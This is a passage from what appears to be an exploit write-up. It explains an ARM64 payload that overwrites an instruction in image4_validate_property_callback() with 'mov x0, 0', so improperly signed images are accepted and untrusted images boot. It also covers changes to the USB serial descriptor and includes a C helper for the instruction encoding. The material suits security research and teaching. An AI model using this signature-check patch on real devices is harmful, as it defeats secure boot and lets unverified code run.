The byte returned by usb_create_string_descriptor() in w0 is stored to usb_serial_number_string_descriptor, so the serial number descriptor refers to the newly created string and reflects the payload’s changes.

mov w0, #0xD2800000
ldr x1, =patch_addr
str w0, [x1]

A value of 0xD2800000 is loaded into w0, which is the encoding of the instruction mov x0, 0. The address patch_addr is loaded into x1, and 0xD2800000 is written to memory at that address. The reason: patch_addr is the address of an instruction inside image4_validate_property_callback(), which this write replaces. So if an image is found to be improperly signed, instead of branching to a function that rejects it, mov x0, 0 sets the return value to 0, so the device thinks it’s a validly signed image. This is the signature check patch that lets untrusted images boot.
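To see where 0xD2800000 comes from, the instruction word can be rebuilt from its fields. This sketch covers only the 64-bit MOVZ form with no shift, which is what mov x0, 0 assembles to; the function name encode_movz_x is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Encodes "movz x<rd>, #imm16" (64-bit, shift of 0).
 * Base opcode 0xD2800000, imm16 in bits 20:5, rd in bits 4:0. */
uint32_t encode_movz_x(unsigned rd, uint16_t imm16) {
    assert(rd < 32);
    return 0xD2800000u | ((uint32_t)imm16 << 5) | rd;
}
```

With rd and imm16 both zero, every field is empty and only the base opcode is left, which is the value the payload writes to patch_addr.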

And that’s it.